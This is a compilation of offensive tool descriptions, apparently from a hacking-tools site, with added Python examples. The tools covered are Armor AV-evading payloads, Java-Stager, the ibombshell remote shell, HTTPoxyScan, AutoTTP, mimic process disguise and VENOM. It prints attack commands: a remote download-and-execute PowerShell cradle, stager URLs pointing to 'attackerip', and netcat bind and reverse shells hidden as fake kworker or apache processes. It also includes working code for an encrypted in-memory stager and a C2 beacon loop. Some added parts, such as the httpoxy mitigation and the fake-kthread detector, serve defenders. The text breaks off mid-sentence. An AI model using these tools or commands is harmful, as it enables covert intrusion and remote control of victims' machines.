Armor – Tool Designed To Create Encrypted macOS Payloads Capable Of Evading Antivirus Scanners

Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. The walkthrough below (shown as a gif in the original README) uses a simple Netcat payload.

A Netcat listener is started on port 4444. The "payload.txt" file is read and shown to contain a simple Bash one-liner that, when executed, will create a TCP connection between the target MacBook and the attacker's Netcat listener. Armor is used to encrypt the Bash one-liner. Ncat is used to host the decryption key on the attacker's server. When the stager is executed on the target MacBook (not shown in the gif), the Bash one-liner is decrypted and executed without writing any data to the hard drive. Ncat terminates the listener immediately after the key has been served, so the key can be fetched only once. When the Netcat connection is established, the attacker has remote access to the target MacBook.

Admittedly, encrypting most macOS-specific payloads is overkill. This specific Bash one-liner is capable of bypassing antivirus without the help of Armor. But this is just an example. The same degree of obfuscation can be applied to sophisticated Python, Ruby, and Shell scripts designed to execute a variety of advanced attacks.

Installation

Armor relies on LibreSSL to encrypt the input file and create the SSL certificate. If LibreSSL isn't found on your system, Armor will attempt to install it; the function that does this is in the script itself. Ncat is also a dependency and can be installed in Kali using:

    apt-get update && apt-get install nmap

Armor can be cloned and executed using the command below:

    git clone Armor/chmod +x /path/to/payload.txt 443

The address argument is the attacker's IP address where the decryption key will be hosted. This can be a local IP address or a VPS. The port number (443) is arbitrary and can be changed as needed.

Questions and concerns:
Twitter: @tokyoneon_
WonderHowTo: dG9reW9uZW9uQHBtLm1lCg==

Download Armor
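To make the flow above concrete, here is an added example of my own; it is not Armor's script. It encrypts a constructed payload with the openssl CLI (AES-256-CBC with PBKDF2 key derivation, the same CLI Armor drives through LibreSSL), hosts the key on a one-shot loopback listener standing in for `ncat -lp PORT < keyfile`, and runs a stager that fetches the key, decrypts in memory and feeds the plaintext to an interpreter over stdin. The function names, the loopback address, the use of /bin/sh instead of a macOS bash one-liner, and the sample payload are all my assumptions.

```python
"""Added example, not Armor's own code: the Armor flow in miniature.

Constructed pieces: a payload encrypted with the openssl CLI (AES-256-CBC,
PBKDF2 key derivation), a one-shot key server standing in for
`ncat -lp PORT < keyfile`, and a stager that fetches the key, decrypts in
memory and hands the plaintext to an interpreter over stdin so it is never
written to disk. Function names are mine.
"""
import secrets
import socket
import subprocess
import threading


def encrypt_payload(plaintext: bytes, key: str) -> bytes:
    """Return the base64 ciphertext the stager will carry (salt header included)."""
    cmd = ["openssl", "enc", "-aes-256-cbc", "-pbkdf2", "-salt", "-a",
           "-pass", "pass:" + key]
    return subprocess.run(cmd, input=plaintext, check=True,
                          capture_output=True).stdout


def decrypt_payload(ciphertext_b64: bytes, key: str) -> bytes:
    """Inverse of encrypt_payload; the salt is read back from the header."""
    cmd = ["openssl", "enc", "-d", "-aes-256-cbc", "-pbkdf2", "-a",
           "-pass", "pass:" + key]
    return subprocess.run(cmd, input=ciphertext_b64, check=True,
                          capture_output=True).stdout


def serve_key_once(key: str):
    """Accept exactly one client, send the key, then close the listener
    (what `ncat -lp PORT < keyfile` does). Returns (port, thread)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(key.encode())
        srv.close()                      # key handed out once; listener is gone

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return port, t


def fetch_key(host: str, port: int) -> str:
    """Stager side: read the key until the server closes the connection."""
    chunks = []
    with socket.create_connection((host, port), timeout=5) as s:
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode().strip()


def stager(ciphertext_b64: bytes, host: str, port: int,
           interpreter=("/bin/sh",)) -> bytes:
    """Fetch key, decrypt in memory, pipe plaintext to the interpreter's stdin.
    Armor's payloads are macOS bash one-liners; /bin/sh is used here (my
    choice) so the example runs anywhere."""
    key = fetch_key(host, port)
    script = decrypt_payload(ciphertext_b64, key)   # plaintext lives only in RAM
    return subprocess.run(list(interpreter), input=script, check=True,
                          capture_output=True).stdout


def demo():
    """End-to-end run: returns (interpreter output, whether a 2nd key fetch worked)."""
    payload = b'echo "hello from stager"\n'          # constructed sample payload
    key = secrets.token_hex(16)
    blob = encrypt_payload(payload, key)             # what you would ship to the target
    port, server = serve_key_once(key)
    output = stager(blob, "127.0.0.1", port)
    server.join()                                    # listener has shut down by now
    try:
        fetch_key("127.0.0.1", port)
        second_fetch_worked = True
    except OSError:                                  # connection refused: key is gone
        second_fetch_worked = False
    return output, second_fetch_worked


if __name__ == "__main__":
    print(demo())
```

Two things worth noting from running it. The one-shot listener is what makes the stager safe to leave lying around: without the key the base64 blob is inert, and after the first fetch the port is closed, so a second request is refused. "Never touches disk" is also narrower than it sounds: the plaintext still exists in the stager's memory and in the interpreter's stdin, so memory forensics, shell audit logging or an EDR that hooks script interpreters will see the decrypted one-liner even though a file scanner never does.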


Java-Stager – A PoC Java Stager Which Can Download, Compile, And Execute A Java File In Memory

A PoC Java Stager which can download, compile, and execute a Java file in memory.

This is for research purposes only; do not use this where you are unauthorised to do so.

What is this?

This is based on the work of James Williams from his talk "Next Gen AV vs My Shitty Code". The key parts of the talk for me are:

- Load a Stager onto the victim (touches disk, but is a benign binary)
- Stager downloads raw code over HTTP (which stays in memory)
- Stager compiles raw code (also in memory)
- Stager then executes compiled code (also in memory)

His example is in .NET, but in the talk he suggested that Java would be capable of the same techniques.

Working with it

Clone down the entire repository. Open it in an IDE which can use Maven (such as NetBeans). The Stager and the example payload are in the "/src/main/java" folder. Alter the Stager as you would like and compile the project. I was using "clean/build" in the default profile. The output in NetBeans included a line like this:

    Building jar: C:\Users\cornerpirate\Documents\NetBeansProjects\java-stager\target\JavaStager-0.1-initial.jar

To work on your victim you must upload the "JavaStager*.jar" file and the "lib" folder containing Janino from the "target" folder. The following command will execute the stager:

    java -jar JavaStager-0.1-initial.jar

You will be prompted with the usage as shown:

    Proper Usage is: java -jar JavaStager-0.1-initial.jar <url>

The "url" is the only parameter that is passed to the Stager. An example usage would be:

    java -jar JavaStager-0.1-initial.jar http://attackerip/Payload.java

Your payload must be in a file named as in the URL you pass (Payload.java in the example above), and your exploit code must be in a static method called "Run". The following shows the template if you want to write your own:

    public class Payload {
        public static void Run() {
            // Your code here
        }
    }

More Information

Blog post explaining how it all works:
Showing how it worked in practice:

Download Java-Stager


Ibombshell – Dynamic Remote Shell

ibombshell is a tool written in PowerShell that gives you a prompt at any time with post-exploitation functionality (and in some cases exploitation). It is a shell that is downloaded directly to memory, providing access to a large number of pentesting features. These functionalities can be downloaded directly to memory in the form of a PowerShell function. This form of execution is known as "everywhere".

In addition, ibombshell provides a second execution mode called "silently", so the pentester can execute an instance of ibombshell (called a warrior). The compromised computer connects to a C2 panel over HTTP, so it is possible to control the warrior and load functions into memory that help the pentester during the post-exploitation phase.

Prerequisites

To run ibombshell everywhere it is mandatory to have PowerShell 3.0 or higher. For operating systems other than Windows you can read more about this in the PowerShell GitHub (PowerShell for every system).

To run ibombshell silently mode you need Python 3.6 and some Python libraries. You can install them with:

    cd ibombshell\ c2/
    pip install -r requirements.txt

Note: ibombshell C2 works in Python 3.x. Make sure you run a pip that belongs to this version.

Usage

ibombshell has two execution modes:

ibombshell everywhere

To load ibombshell simply run in PowerShell:

    iex (new-object net.webclient).downloadstring('')

Now you can run the downloaded ibombshell console:

    console

ibombshell silently mode

This version allows you to run the ibombshell console and remotely control it from the C2 panel written in Python. To run this version, first launch the console process in PowerShell:

    iex (new-object net.webclient).downloadstring('')

On the ibombshell C2 path, prepare the C2:

    python3

And create the listener the warriors will connect to:

    iBombShell> load modules/
    [+] Loading module…
    [+] Module loaded!
    iBombShell[modules/]> run

The default listener port is 8080. Finally, launch the console in silently mode on the host to get remote control:

    console -Silently -uriConsole http://[ip or domain]:[port]

ibombshell C2 scheme

The basic operation of the ibombshell control panel follows this sequence between the warrior and the C2:

1. A new ibombshell (warrior) registers with the C2, which records the IP it came from.
2. The warrior requests functions and instructions from the C2.
3. The C2 sends the functions and instructions.
4. The warrior executes them in memory.
5. The warrior sends the results back to the C2.

Docker

We have created a Docker container with everything you need to make it work. Run these commands from the Dockerfile location:

    sudo docker build -t "ibombshell" .
    sudo docker run -it ibombshell

Example videos

Some example videos:

- iBombShell: PoC Warrior + Bypass UAC + Pass the hash
- iBombShell: macOS
- ibombshell: Extracting Private SSH Keys on Windows 10
- iBombShell: PoC savefunctions

Download Ibombshell
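The register / get-instructions / execute / report loop from the C2 scheme above, as an added worked exchange of my own; this is not ibombshell's code. Both sides run in one process and pass the dicts an HTTP JSON API would carry instead of real HTTP. The endpoint names (/register, /instructions, /results), the message fields, the warrior ID scheme and the sample hostinfo function are assumptions, not ibombshell's actual protocol; the warrior runs Python functions where ibombshell loads PowerShell ones.

```python
"""Added example, not ibombshell's code: the warrior <-> C2 loop from the
scheme above, in-process. Endpoints, fields and the sample function are
my assumptions about what such a protocol carries.
"""
import json
import uuid


class C2:
    """Server side: tracks warriors, queues function source plus an
    instruction for each, and stores what comes back."""

    def __init__(self):
        self.warriors, self.tasks, self.results = {}, {}, {}

    def handle(self, path, body):
        """Stands in for one HTTP request: path plus JSON body in, JSON out."""
        msg = json.loads(body)
        if path == "/register":                 # new ibombshell -> register from IP
            wid = str(uuid.uuid4())
            self.warriors[wid] = msg["ip"]
            self.tasks[wid], self.results[wid] = [], []
            return json.dumps({"id": wid})
        wid = msg["id"]
        if path == "/instructions":             # get functions and instructions
            pending, self.tasks[wid] = self.tasks[wid], []
            return json.dumps(pending)
        if path == "/results":                  # results
            self.results[wid].append(msg["output"])
            return json.dumps({"ok": True})
        raise ValueError("unknown endpoint " + path)

    def task(self, wid, function_src, instruction):
        """Operator action: send a function to load and something to run."""
        self.tasks[wid].append({"function": function_src,
                                "instruction": instruction})


class Warrior:
    """Client side: functions live only in this dict, never on disk."""

    def __init__(self, c2, ip):
        self.c2, self.ip, self.loaded = c2, ip, {}
        reply = c2.handle("/register", json.dumps({"ip": ip}))
        self.id = json.loads(reply)["id"]

    def beacon(self):
        """One check-in: fetch pending tasks, load and run each, report back."""
        reply = self.c2.handle("/instructions", json.dumps({"id": self.id}))
        for t in json.loads(reply):
            exec(t["function"], self.loaded)               # load into memory
            output = eval(t["instruction"], self.loaded)   # execute
            self.c2.handle("/results",
                           json.dumps({"id": self.id, "output": output}))


# constructed sample "module": loaded into the warrior, then invoked
HOSTINFO_SRC = "import platform\ndef hostinfo():\n    return platform.system()\n"


def demo():
    c2 = C2()
    w = Warrior(c2, "10.0.0.5")                  # constructed warrior address
    c2.task(w.id, HOSTINFO_SRC, "hostinfo()")
    w.beacon()
    return c2.results[w.id]


if __name__ == "__main__":
    print(demo())
```

The shape to notice for detection is the same whether the functions are PowerShell or Python: a periodic client-initiated HTTP poll, code arriving in the response body rather than from disk, and results leaving in a follow-up POST. Everything an analyst would want to capture sits in those three request types.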


HTTPoxyScan – HTTPoxy Exploit Scanner

PoC/exploit scanner to scan common CGI files on a target URL for the HTTPoxy vulnerability. httpoxy is a set of vulnerabilities that affect application code running in CGI or CGI-like environments: the client-supplied "Proxy" request header is copied into the HTTP_PROXY environment variable, which many HTTP client libraries then honour as their outgoing proxy. For more details, go to the httpoxy advisory site. ncat is required to establish the reverse session.

USAGE:

    ./ cgi_list.txt 3000

This will scan with a list of common CGI files while injecting a Proxy header pointing back to a given IP:PORT. A reverse listener catches the incoming connection to confirm the remote site is vulnerable: a vulnerable backend that makes an outbound HTTP request routes it through the attacker's listener.

Download HTTPoxyScan
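An added example of my own, not HTTPoxyScan's code, showing where httpoxy comes from and how to check for it without a target: the CGI header-to-environment mapping that creates the exposure, the hardened mapping beside it, the header the scanner injects, and a check against Python's own standard library, whose proxy lookup was patched for httpoxy (CVE-2016-1000110) to ignore HTTP_PROXY whenever REQUEST_METHOD marks it as running under CGI. The listener address 10.0.0.1:3000 and the request headers are constructed; the Apache and nginx directives quoted in the comments are the mitigations from the httpoxy advisory.

```python
"""Added example, not HTTPoxyScan's code: the httpoxy mechanism, its fix at
the gateway, and a stdlib check. Sample headers and the attacker address
are constructed.
"""
import os
from urllib.request import getproxies_environment


def cgi_environ(headers):
    """RFC 3875 mapping as CGI gateways do it: every request header becomes
    HTTP_<NAME>. A client-supplied 'Proxy:' header therefore lands in
    HTTP_PROXY, which many HTTP client libraries read as their outgoing
    proxy. This is the vulnerable behaviour."""
    env = {}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def cgi_environ_hardened(headers):
    """Mitigation at the gateway: never let 'Proxy' through. The advisory's
    Apache equivalent is `RequestHeader unset Proxy early`; for nginx it is
    `fastcgi_param HTTP_PROXY "";`."""
    return cgi_environ({n: v for n, v in headers.items()
                        if n.lower() != "proxy"})


def scanner_headers(listener_ip, listener_port):
    """What the scanner injects: a Proxy header pointing at the reverse
    listener. A vulnerable backend that makes any outbound HTTP call will
    connect there, which is what the listener catches."""
    return {"Host": "target.example",
            "Proxy": f"http://{listener_ip}:{listener_port}"}


def proxy_seen_by_client(env, cgi_mode):
    """Run Python's stdlib proxy lookup under the given environment.
    Since the httpoxy fix it ignores HTTP_PROXY when REQUEST_METHOD is set,
    i.e. when the process is a CGI script."""
    saved = dict(os.environ)
    try:
        for k in list(os.environ):              # start from a proxy-free env
            if k.lower().endswith("_proxy") or k == "REQUEST_METHOD":
                del os.environ[k]
        os.environ.update(env)
        if cgi_mode:
            os.environ["REQUEST_METHOD"] = "GET"
        return getproxies_environment().get("http")
    finally:
        os.environ.clear()
        os.environ.update(saved)


def demo():
    req = scanner_headers("10.0.0.1", 3000)     # constructed attacker address
    vuln = cgi_environ(req)
    safe = cgi_environ_hardened(req)
    return {
        "vulnerable_env_has_proxy": vuln.get("HTTP_PROXY"),
        "hardened_env_has_proxy": safe.get("HTTP_PROXY"),
        "patched_client_in_cgi": proxy_seen_by_client(vuln, cgi_mode=True),
        "client_outside_cgi": proxy_seen_by_client(vuln, cgi_mode=False),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The last two results are the practitioner's check: the same environment is honoured outside CGI (so the attacker's proxy would be used) and ignored under CGI by a patched client. A backend whose HTTP library predates its httpoxy fix, or which is given a lower-case http_proxy by some other path, still needs the gateway-side header stripping.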


AutoTTP – Automated Tactics Techniques & Procedures

Automated Tactics, Techniques & Procedures. Re-running complex sequences manually for regression tests, product evaluations, generating data for researchers and so on can be tedious. I toyed with the idea of making it easier to script Empire (or any framework/product/toolkit that provides an API, such as Metasploit (RPC), Cobalt Strike and so on) using an IDE like Visual Studio Code (or equivalent). So I started to design AutoTTP. This is still very much work in progress. Please use Empire 2.2.

What is TTP?

The tactics are organized as per my Attack Life Cycle model. There are other models like Lockheed Martin's Kill Chain(R), Mandiant's Attack Life Cycle and MITRE's ATT&CK. Whichever model it may be, a "Tactic" essentially groups techniques together; e.g. code-execution/run-payload can be achieved in many ways.

A "Stage" is used to group relevant "Tactics" together. If you look into the source tree, the folder structure reflects the matrix's Tactics column. The matrix also lists the respective controls for each offensive tactic.

How did these stages come about?

The Venn diagram in the middle of the red cycle is from Dartmouth College's "Three Tenets for Secure Cyber-Physical System Design and Assessment". It defines the necessary and sufficient conditions, or simply the requirements, of any successful physical/logical attack. I added the red ring (stages) around the Venn diagram to illustrate typical offensive flows which ultimately lead to impact on information confidentiality, integrity and system availability, or safety if it relates to cyber-physical systems (think Critical Information Infrastructure).

An attacker can start from Stage 1 and go straight into Stage 4, e.g. default admin credentials on a publicly exposed admin page. It does not need to be linear (stage 1->2->3->4). After the initial infiltration, s/he could have performed some internal information gathering (recon) first before escalating privilege on the first machine and then launching a remote command to another target machine within the same network. For the next victim machine, it is a Stage 2: successful payload delivery and execution which allows the attacker to gain command and control over yet another machine.

Download AutoTTP


Mimic – A Tool For Covert Execution In Linux

mimic is a tool for covert execution on Linux x86_64.

What is "covert execution"?

Covert execution is the art of hiding a process. In this case, mimic hides the process in plain sight. mimic can launch any program and make it look like any other program. Any user can use it. It does not require special permissions, special binaries, or a rootkit.

What?! No special privileges??

That is correct. mimic works by rearranging the internal structures of a process in such a way that the /proc entry for that process becomes misleading. The usual tools that report on a process (ps, top, lsof and friends) do so by examining /proc. If we can bend /proc, then we can hide a process in plain sight. Since we are only altering the state of a process we own, anyone can successfully run mimic.

Can this be detected?!

Of course, but only if you are looking very closely, or running a forensic tool that is looking for this sort of thing. The usefulness of mimic is that it prevents someone from becoming suspicious in the first place.

Will this work with scripts?

Yes, but you need to call mimic directly on the interpreter. For example, if the first line of your script is "#!/usr/bin/perl" then you'll want to call mimic like this:

    empty@monkey:~$ mimic -e "/usr/bin/perl"

By invoking the interpreter directly, mimic can work its magic.

Who is the target audience for mimic?

Anyone who legitimately needs covert execution before they have gotten root. This includes, but is not limited to:

- Pentesters.
- Investigators performing covert operations (with the prior approval of their Legal and HR departments, of course).

Why is it called "mimic"?

Because "Liar, liar, /proc on fire!" was too long.

What is "set_target_pid"?

set_target_pid is a small helper program in the mimic suite that will exhaust PIDs until the one you want comes back around. This allows you to choose where in the process listing you want your process to sit. Note that after PID wraparound the kernel does not hand out the first 300 PIDs again (RESERVED_PIDS); they stay with boot-time processes and kernel threads. If you try to go below that, you'll probably end up running with PID 301.

Installation

    git clone <ptrace_do repository>
    cd ptrace_do
    make
    cd ..
    git clone <mimic repository>
    cd mimic
    make

Usage

    usage: mimic -e COMMAND [-m MIMIC] [-b] [-a KEY=VALUE] [-q] [-h]

        -e  Execute COMMAND.
        -m  Set up COMMAND to look like MIMIC.
            Default for non-root is: "/usr/sbin/apache2 -k start"
            Default for root is:     "[kworker/0:0]"
        -b  Launch COMMAND in the background.
        -a  Add / overwrite KEY to the mimic environment with associated VALUE.
        -q  Be quiet! Do not print normal output.
        -h  Print this helpful message.

    Notes:
        The MIMIC environment will be a copy of the COMMAND environment.
        The '_' variable is automatically changed.
        The -a flag can be called multiple times to add / overwrite multiple variables.

    Examples:
        mimic -e /bin/bash
        set_target_pid 1 && mimic -e /bin/bash
        mimic -b -e "./revsh"
        mimic -b -e "nc -l -e /bin/bash"
        mimic -b -e "nc -l -e \"mimic -e /bin/bash\""

Examples

First example – Launching a netcat listener as a regular user:

    empty@monkey:~$ ./mimic -b -e "/usr/local/bin/ncat -l -e \"./mimic -e /bin/bash\""
    Launching child… Success!
    Waiting for child to attach… Success!
    Initializing ptrace_do… Success!
    Determining stack state… Success!
    Politely requesting name change… Success!
    Searching for main()… Success!
    Building execution headers… Success!
    Setting up final state… Success!
    Good-bye and have a good luck! :)
    empty@monkey:~$ ps aux | grep apache
    empty     1931 19.5  0.0  16648  1324 pts/1    S    21:41   0:02 /usr/sbin/apache2 -k start
    empty     1935  0.0  0.0   7596   836 pts/1    S+   21:41   0:00 grep apache
    empty@monkey:~$ sudo lsof -i -n -P | grep apache
    [sudo] password for empty:
    apache2   1931 empty    3u  IPv6  14462      0t0  TCP *:31337 (LISTEN)
    apache2   1931 empty    4u  IPv4  14463      0t0  TCP *:31337 (LISTEN)

Second example – Launching a netcat reverse shell as root:

    root@monkey:~$ /home/empty/code/mimic/set_target_pid 1 && /home/empty/code/mimic/mimic -b -q -e "/usr/local/bin/ncat -e \"/home/empty/code/mimic/mimic -e \\\"/bin/bash\\\"\" localhost 9999"

Can you spot the fake kworkers? Would you be able to without the help of grep?

    root@monkey:~$ ps aux | grep kworker | grep -v grep
    root        18  0.0  0.0      0     0 ?        S    19:39   0:00 [kworker/3:0]
    root       197  0.0  0.0      0     0 ?        S    19:39   0:06 [kworker/u:3]
    root       198  0.0  0.0      0     0 ?        S    19:39   0:06 [kworker/u:4]
    root       199  0.0  0.0      0     0 ?        S    19:39   0:06 [kworker/u:5]
    root       302 23.4  0.0  18748  1912 pts/5    S    22:28   0:02 [kworker/0:0]
    root       304 11.4  0.0   3780   296 pts/5    S    22:28   0:00 [kworker/0:0]
    root       305 10.8  0.0  10644  1200 pts/5    S    22:28   0:00 [kworker/0:0]
    root       426  0.0  0.0      0     0 ?        S    20:20   0:00 [kworker/1:0]
    root       434  0.0  0.0      0     0 ?        S    20:20   0:00 [kworker/3:2]
    root       536  0.0  0.0      0     0 ?        S    20:12   0:00 [kworker/0:0]
    root       879  0.0  0.0      0     0 ?        S    20:39   0:00 [kworker/2:0]
    root      1463  0.0  0.0      0     0 ?        S    19:39   0:00 [kworker/1:2]
    root      2132  0.0  0.0      0     0 ?        S    19:47   0:00 [kworker/2:2]
    root      2607  0.0  0.0      0     0 ?        S    20:01   0:01 [kworker/0:1]

The giveaway in that listing is the columns mimic does not touch: the three fakes (PIDs 302, 304 and 305) have a controlling terminal (pts/5) and non-zero VSZ and RSS, whereas a genuine kernel thread shows "?" and zeros because it has no user-space address space at all.

Of course, no kworker should have an open socket, but I'm sure you can be more creative with your naming choices than this. :)

    root@monkey:~$ lsof -i -n -P | grep kworker
    kworker/0   302 root    4u  IPv4  20546      0t0  TCP> (ESTABLISHED)
    kworker/0   304 root    4u  IPv4  20546      0t0  TCP> (ESTABLISHED)
    kworker/0   305 root    4u  IPv4  20546      0t0  TCP> (ESTABLISHED)

Note that I'm running here as root only because a kworker thread would be very suspicious running as a non-root user. The new mimic name is just a string. It doesn't have to be an existing process. Hell, it doesn't even have to be a real thing!

    empty@monkey:~$ code/mimic/mimic -q -e /bin/bash -m "Totally not a rootkit\!"
    empty@monkey:~$ ps aux | grep rootkit | grep -v grep
    empty      399  2.9  0.0   3780   300 pts/4    S    22:34   0:00 Totally not a rootkit!
    empty      400  2.7  0.0  19372  2044 pts/4    S    22:34   0:00 Totally not a rootkit!

Download Mimic
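The two tells above turned into checks, as an added example of my own rather than anything shipped with mimic. The ps sample is a handful of rows copied from the page's second example; the lsof sample is constructed in the same layout with made-up addresses, since the page's lsof lines lost theirs. live_suspects() needs no sample but reads /proc and is therefore Linux-only; the helper names and the kernel-thread name prefixes are my choices.

```python
"""Added example, not part of mimic: checks that catch a mimic'd process.
PS_SAMPLE is reconstructed from the page's own listing; LSOF_SAMPLE is
constructed with made-up addresses. live_suspects() is Linux-only.
"""
import os
import re

PS_SAMPLE = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 18 0.0 0.0 0 0 ? S 19:39 0:00 [kworker/3:0]
root 302 23.4 0.0 18748 1912 pts/5 S 22:28 0:02 [kworker/0:0]
root 304 11.4 0.0 3780 296 pts/5 S 22:28 0:00 [kworker/0:0]
root 305 10.8 0.0 10644 1200 pts/5 S 22:28 0:00 [kworker/0:0]
root 536 0.0 0.0 0 0 ? S 20:12 0:00 [kworker/0:0]
empty 1931 19.5 0.0 16648 1324 pts/1 S 21:41 0:02 /usr/sbin/apache2 -k start
"""

LSOF_SAMPLE = """\
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
kworker/0 302 root 4u IPv4 20546 0t0 TCP 127.0.0.1:40212->127.0.0.1:9999 (ESTABLISHED)
apache2 1931 empty 3u IPv6 14462 0t0 TCP *:31337 (LISTEN)
"""

KTHREAD_NAME = re.compile(r"^\[[^\]]+\]$")        # ps shows kernel threads as [name]
KTHREAD_PREFIXES = ("kworker", "ksoftirqd", "kthreadd", "migration", "rcu_")


def parse_ps(text):
    """Parse `ps aux` output; the COMMAND column keeps its spaces."""
    rows = []
    for line in text.splitlines()[1:]:
        f = line.split(None, 10)
        rows.append({"user": f[0], "pid": int(f[1]), "vsz": int(f[4]),
                     "rss": int(f[5]), "tty": f[6], "cmd": f[10]})
    return rows


def fake_kthreads_in_ps(rows):
    """A real kernel thread has no user-space address space (VSZ and RSS
    are 0) and no controlling terminal (TTY is '?'). A renamed user
    process cannot make those columns lie."""
    return sorted(r["pid"] for r in rows
                  if KTHREAD_NAME.match(r["cmd"])
                  and (r["vsz"] or r["rss"] or r["tty"] != "?"))


def kthreads_with_sockets(lsof_text):
    """Kernel threads never own sockets. `lsof -i` truncates COMMAND to
    nine characters, hence the prefix match rather than a full name."""
    hits = set()
    for line in lsof_text.splitlines()[1:]:
        f = line.split()
        if f[0].startswith(KTHREAD_PREFIXES):
            hits.add(int(f[1]))
    return sorted(hits)


def live_suspects():
    """Linux only. For a genuine kernel thread /proc/<pid>/exe cannot be
    read (no backing executable) and cmdline is empty; a user process
    wearing a kernel-thread name has both. Returns [(pid, argv0, exe)]."""
    found = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                argv0 = fh.read().split(b"\0")[0].decode(errors="replace")
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue                                  # real kthread, or gone
        if KTHREAD_NAME.match(argv0):
            found.append((int(pid), argv0, exe))
    return found


if __name__ == "__main__":
    print("fake kthreads by ps columns:", fake_kthreads_in_ps(parse_ps(PS_SAMPLE)))
    print("kthreads holding sockets:", kthreads_with_sockets(LSOF_SAMPLE))
    if os.path.isdir("/proc"):
        print("live /proc suspects:", live_suspects())
```

Run against the page's own listing this flags exactly 302, 304 and 305. The /proc check is the one to keep in a hunting script: the name is a string the owner controls, but the exe symlink, the memory counters and the TTY come from the kernel's view of the task and survive a rename.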


VENOM 1.0.15 – Metasploit Shellcode Generator/Compiler/Listener

The script will use msfvenom (Metasploit) to generate shellcode in different formats (c | python | ruby | dll | msi | hta-psh), inject the generated shellcode into one template (example: python; "the python function will execute the shellcode in RAM"), and use compilers like gcc (the GNU Compiler Collection), mingw32 or pyinstaller to build the executable file. It also starts a multi-handler to receive the remote connection (shell or meterpreter session). The 'venom generator' tool reproduces some of the techniques used by several other tools.

"P.S. some payloads are undetectable by AV solutions... yes!!!" One of the reasons for that is the use of a function to execute the second stage of the shell/meterpreter directly in the target's RAM; the other reason is the use of external obfuscators/crypters.

HOW DO I DELIVER MY PAYLOADS TO THE TARGET HOST?

venom (malicious_server) was built to take advantage of the apache2 web server to deliver payloads (LAN) using a fake web page written in HTML that takes advantage of